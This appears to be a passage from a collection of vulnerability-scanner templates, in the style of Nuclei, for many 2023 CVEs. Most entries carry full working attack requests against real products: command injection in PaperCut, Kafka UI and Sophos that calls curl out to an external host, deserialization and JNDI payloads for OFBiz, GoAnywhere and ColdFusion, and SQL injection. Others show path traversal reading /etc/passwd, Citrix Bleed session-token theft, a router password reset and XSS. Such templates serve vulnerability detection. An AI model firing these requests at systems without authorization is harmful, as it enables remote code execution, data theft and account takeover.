Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view","{{BaseURL}}/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki"],"skip-variables-check":true,"extractors":[{"type":"regex","group":1,"name":"id","regex":["data-xwiki-async-client-id=\"(.+?)\""],"internal":true},{"type":"regex","group":1,"name":"url","regex":["<span class=\"xwiki-async\" data-xwiki-async-id=\"(.+?)\""],"internal":true}],"matchers":[{"type":"dsl","dsl":["body_2 == \"31557644536232\"","contains(header_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-49070","info":{"name":"Apache OFBiz < 18.12.10 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?>\n  <methodCall>\n    <methodName>{{randstr}}</methodName>\n    <params>\n      <param>\n      <value>\n        <struct>\n       <member>\n          <name>test</name>\n          <value>\n      <serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")}}</serializable>\n          </value>\n        </member>\n      </struct>\n      </value>\n    </param>\n    </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["<name>faultString</name>"]}]}]},{"id":"CVE-2023-0630","info":{"name":"Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[slimstat f=\"count\" w=\"author\"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"audioShortcodeLibrary\")"],"condition":"and"}]}]},{"id":"CVE-2023-2309","info":{"name":"wpForo Forum <= 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"<script>alert(/document.domain/)</script>\",\"wpforo\")","contains(header,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-41642","info":{"name":"RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /RealGimmWeb/Pages/Sistema/LogObjectTrace.aspx HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: </span><script>alert(document.domain)</script>\n\n__EVENTTARGET=T1bPulsantiera&EVENTARGUMENT=TlbPulsantiera_Item_0%3AUP&___VIEWSTATE='TESTING&LeftArea%3ALeftMenu_hidden=&T1bPulsantiera_CancelClick=false&TlbPulsantiera_hidden=&cbUtente=&txtDataRichiestaDa=&txtDataRichiestaA=&TopArea%3ATopMenu=\n","GET /RealGimmWeb/Pages/ErroreNonGestito.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: </span><script>alert(document.domain)</script>\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>","Invalid_Viewstate"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]}]}]},{"id":"CVE-2023-6380","info":{"name":"OpenCms 14 & 15 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/modules/alkacon.mercury.template.jsondemo/elements/jsonapi.jsp?content&fallbackLocale&locale=en&rows=1&uri=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2023-5991","info":{"name":"Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["filename=","/etc/passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46732","info":{"name":"XWiki < 14.10.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e","{{BaseURL}}/xwiki/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains(body, \"<script>alert(document.domain)</script>\\\" id=\\\"tmViewSource\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-47211","info":{"name":"ManageEngine OpManager - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /two_factor_auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nj_username={{username}}&j_password={{password}}\n","POST /client/api/json/mibbrowser/uploadMib HTTP/1.1\nHost: {{Hostname}}\nX-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}\nContent-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262\n\n-----------------------------372334936941313273904263503262\nContent-Disposition: form-data; name=\"mibFile\"; filename=\"karas.txt\"\nContent-Type: text/plain\n\n../images/karas DEFINITIONS ::= BEGIN\n\n\nIMPORTS\n    enterprises\n        FROM RFC1155-SMI;\n\nmicrosoft       OBJECT IDENTIFIER ::= { enterprises 311 }\nsoftware        OBJECT IDENTIFIER ::= { microsoft 1 }\nsystems         OBJECT IDENTIFIER ::= { software 1 }\nos              OBJECT IDENTIFIER ::= { systems 3 }\nwindowsNT       OBJECT IDENTIFIER ::= { os 1 }\nwindows         OBJECT IDENTIFIER ::= { os 2 }\nworkstation     OBJECT IDENTIFIER ::= { windowsNT 1 }\nserver          OBJECT IDENTIFIER ::= { windowsNT 2 }\ndc              OBJECT IDENTIFIER ::= { windowsNT 3 }\n\nEND\n\n-----------------------------372334936941313273904263503262--\n","POST /client/api/json/mibbrowser/uploadMib HTTP/1.1\nHost: {{Hostname}}\nX-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}\nContent-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262\n\n-----------------------------372334936941313273904263503262\nContent-Disposition: form-data; name=\"mibFile\"; filename=\"karas.txt\"\nContent-Type: text/plain\n\n../images/karas DEFINITIONS ::= BEGIN\n\n\nIMPORTS\n    enterprises\n        FROM RFC1155-SMI;\n\nmicrosoft       OBJECT IDENTIFIER ::= { enterprises 311 }\nsoftware        OBJECT IDENTIFIER ::= { microsoft 1 }\nsystems         OBJECT IDENTIFIER ::= { software 1 }\nos              OBJECT IDENTIFIER ::= { systems 3 }\nwindowsNT       OBJECT IDENTIFIER ::= { os 1 }\nwindows         OBJECT IDENTIFIER ::= { os 2 }\nworkstation     OBJECT IDENTIFIER ::= { windowsNT 1 }\nserver          OBJECT IDENTIFIER ::= { windowsNT 2 }\ndc              OBJECT IDENTIFIER ::= { windowsNT 3 }\n\nEND\n\n-----------------------------372334936941313273904263503262--\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")","contains(body, \"MIBFile with same name already exists\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"x_zcsrf_token","group":1,"part":"header","regex":["Set-Cookie: opmcsrfcookie=([^;]{50,})"],"internal":true}]}]},{"id":"CVE-2023-38203","info":{"name":"Adobe ColdFusion - Deserialization of Untrusted Data","severity":"critical"},"requests":[{"raw":["POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-4169","info":{"name":"Ruijie RG-EW1200G Router - Password Reset","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/sys/set_passwd"],"body":"{\n\"username\":\"web\",\n\"admin_new\":\"{{password}}\"\n}\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":\"ok\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27179","info":{"name":"GDidees CMS v3.9.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_admin/imgdownload.php?filename=imgdownload.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["$filename=$_GET[\"filename\"];","@readfile($filename) OR die();"],"condition":"and"},{"type":"word","part":"header","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-41538","info":{"name":"PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"New Question\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-1671","info":{"name":"Sophos Web Appliance - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?c=blocked&action=continue HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargs_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64(\"\\';curl http://{{interactsh-url}} #\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2023-3843","info":{"name":"mooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number="],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains(body, \"><img src=a onerror=alert(document.domain)>w71ch\") && contains(body, \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-45542","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/index/?q=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"<script>alert(document.domain)</script>\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-42343","info":{"name":"OpenCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opencms/cmisatom/cmis-online/type?id=1%27\"><svg%20onload=alert(document.domain)>"],"headers":{"Content-Type":"application/cmisquery+xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Apache Chemistry OpenCMIS","<svg onload=alert(document.domain)>"],"condition":"and"}]}]},{"id":"CVE-2023-39361","info":{"name":"Cacti 1.2.24 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=10","status_code == 200","contains_all(body, \"Tree Mode\", \"cacti\")"],"condition":"and"}]}]},{"id":"CVE-2023-4966","info":{"name":"Citrix Bleed - Leaking Session Tokens","severity":"high"},"requests":[{"raw":["GET /oauth/idp/.well-known/openid-configuration HTTP/1.1\n{{str}}: {{Hostname}}\nHost: {{payload}}\n\n","POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1\nHost: {{Hostname}}\nCookie: NSC_AAAC={{session}}\n\n"],"unsafe":true,"extractors":[{"type":"regex","name":"session","part":"body_1","group":1,"regex":["([a-f0-9]{100}45525d5f4f58455e445a4a42)"],"internal":true},{"type":"regex","part":"body_2","regex":["([a-z0-9._]+)"]}],"matchers-condition":"and","matchers":[{"type":"word","words":["NSC_AAAC=","HTTP/1.1"]},{"type":"word","words":["{\"issuer\":"]}]}]},{"id":"CVE-2023-47117","info":{"name":"Label Studio - Sensitive Information Exposure","severity":"high"},"requests":[{"raw":["GET /user/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login/?next=/projects/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on\n","PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":{{Task_id}},\"data\":{\"title\":\"Tasks\",\"ordering\":[],\"type\":\"list\",\"target\":\"tasks\",\"filters\":{\"conjunction\":\"or\",\"items\":[{\"filter\":\"filter:tasks:updated_by__active_organization__active_users__password\",\"operator\":\"regex\",\"value\":\"^pbkdf2_sha256\\\\$260000\\\\$\",\"type\":\"String\"}]},\"hiddenColumns\":{\"explore\":[],\"labeling\":[]},\"columnsWidth\":{},\"columnsDisplayType\":{},\"gridWidth\":4,\"search_text\":null},\"project\":\"{{Project_id}}\"}\n","GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_4, \"completed_at\", \"file_upload\", \"annotators\")","status_code_3==200 && status_code_4==200","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","name":"csrf","group":1,"regex":["me=\"csrfmiddlewaretoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-34659","info":{"name":"JeecgBoot 3.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/show HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"id\":\"961455b47c0b86dc961e90b5893bff05\",\"apiUrl\":\"\",\"params\":\"{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XPATH syntax error:","SQLException"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35843","info":{"name":"NocoDB version <= 0.106.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20073","info":{"name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /index.html HTTP/1.1\nHost: {{Hostname}}\n","POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1\nHost: {{Hostname}}\nAuthorization: 1\nContent-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf\n\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"pathparam\"\n\nPortal\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"fileparam\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file.path\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file\"; filename=\"index.html\"\nContent-Type: application/octet-stream\n\n{{index}}\n{{html_comment}}\n\n--------------------------f6f99e26f3a45adf--\n","GET /index.html HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"dsl","name":"index","internal":true,"dsl":["body_1"]}],"matchers":[{"type":"word","part":"body_3","words":["{{html_comment}}"]}]}]},{"id":"CVE-2023-27640","info":{"name":"PrestaShop tshirtecommerce - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tshirtecommerce/fonts.php?name=2&type=./../index.php"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(base64_decode(body), \"PrestaShop\", \"<?php\")"],"condition":"and"}]}]},{"id":"CVE-2023-25194","info":{"name":"Apache Druid Kafka Connect - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"type\":\"kafka\",\n    \"spec\":{\n        \"type\":\"kafka\",\n        \"ioConfig\":{\n            \"type\":\"kafka\",\n            \"consumerProperties\":{\n                \"bootstrap.servers\":\"127.0.0.1:6666\",\n                \"sasl.mechanism\":\"SCRAM-SHA-256\",\n                \"security.protocol\":\"SASL_SSL\",\n                \"sasl.jaas.config\":\"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\\\"rmi://{{interactsh-url}}:6666/test\\\" useFirstPass=\\\"true\\\" serviceName=\\\"x\\\" debug=\\\"true\\\" group.provider.url=\\\"xxx\\\";\"\n            },\n            \"topic\":\"test\",\n            \"useEarliestOffset\":true,\n            \"inputFormat\":{\n                \"type\":\"regex\",\n                \"pattern\":\"([\\\\s\\\\S]*)\",\n                \"listDelimiter\":\"56616469-6de2-9da4-efb8-8f416e6e6965\",\n                \"columns\":[\n                    \"raw\"\n                ]\n            }\n        },\n        \"dataSchema\":{\n            \"dataSource\":\"sample\",\n            \"timestampSpec\":{\n                \"column\":\"!!!_no_such_column_!!!\",\n                \"missingValue\":\"1970-01-01T00:00:00Z\"\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"granularitySpec\":{\n                \"rollup\":false\n            }\n        },\n        \"tuningConfig\":{\n            \"type\":\"kafka\"\n        }\n    },\n    \"samplerConfig\":{\n        \"numRows\":500,\n        \"timeoutMs\":15000\n    }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["RecordSupplier"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-4111","info":{"name":"PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0&session_id="],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"You have an error in your SQL syntax\", \"><script>alert(document.domain)</script>\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-49785","info":{"name":"ChatGPT-Next-Web - SSRF/XSS","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23","{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"],"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<script>alert(document.domain)</script>\")","contains(header_1, \"text/html\")"],"condition":"and"},{"type":"dsl","dsl":["contains(header_2,'X-Interactsh-Version')","contains(interactsh_protocol_2,'dns')"],"condition":"and"}]}]},{"id":"CVE-2023-34752","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=lang&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=English&flag=en.gif&filename=english.php&date=m%2Fd%2FY&datetime=m%2Fd%2FY+-+H%3Ai&token=en&lid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-6977","info":{"name":"Mlflow <2.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"//proc/self/root\"}\n","GET /model-versions/get-artifact?name={{randstr}}&path=etc%2Fpasswd&version=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"word","part":"header_3","words":["filename=passwd","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0947","info":{"name":"Flatpress < 1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fp-content/","{{BaseURL}}/flatpress/fp-content/"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"<title>Index of /fp-content</title>\")"],"condition":"and"}]}]},{"id":"CVE-2023-27350","info":{"name":"PaperCut - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /app?service=page/SetupCompleted HTTP/1.1\nHost: {{Hostname}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FSetupCompleted%2F%24Form&sp=S0&Form0=%24Hidden%2CanalyticsEnabled%2C%24Submit&%24Hidden=true&%24Submit=Login\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print-and-device.script.enabled&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=Y&%24Submit=Update\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print.script.sandboxed&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=N&%24Submit=Update\n","GET /app?service=page/PrinterList HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=page%2FPrinterList\n","POST /app?service=direct/1/PrinterList/selectPrinter&sp={{printerID}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterList%2FselectPrinter&sp={{printerID}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2FprinterOptionsTab.tab&sp=4\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2F%24PrinterDetailsScript.%24Form&sp=S0&Form0=printerId%2CenablePrintScript%2CscriptBody%2C%24Submit%2C%24Submit%240%2C%24Submit%241&printerId={{printerID}}&enablePrintScript=on&scriptBody=function+printJobHook%28inputs%2C+actions%29+%7B%7D%0D%0Ajava.lang.Runtime.getRuntime%28%29.exec%28%27{{cmd}}%27%29%3B&%24Submit%241=Apply\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Avanceret kontering"]}],"extractors":[{"type":"regex","name":"printerID","group":1,"regex":["erList\\/selectPrinterCost&amp;sp=([a-z0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-41266","info":{"name":"Qlik Sense Enterprise - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf"],"headers":{"Cookie":"X-Qlik-Session=13333333-3333-3333-3333-333333333337","X-Qlik-Xrfkey":"1333333333333337"},"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(to_lower(set_cookie), 'x-qlik-session')","contains(body, 'The comparison expression does not consist of three elements')"],"condition":"and"}]}]},{"id":"CVE-2023-0669","info":{"name":"Fortra GoAnywhere MFT - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goanywhere/lic/accept HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\nbundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\")))), '$2')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["GoAnywhere"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-24733","info":{"name":"PMB 7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>@"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35844","info":{"name":"Lightdash version <= 0.510.3 Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-52251","info":{"name":"Kafka UI 0.7.1 Command Injection","severity":"high"},"requests":[{"raw":["GET /api/clusters HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"cluster-name","internal":true,"json":[".[0].name"]}]},{"raw":["GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"topic-name","internal":true,"json":[".topics[].name"]}]},{"raw":["@timeout 20s\nGET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Assigning partitions"]}]}]},{"id":"CVE-2023-0448","info":{"name":"WP Helper Lite < 4.3 - Cross-Site 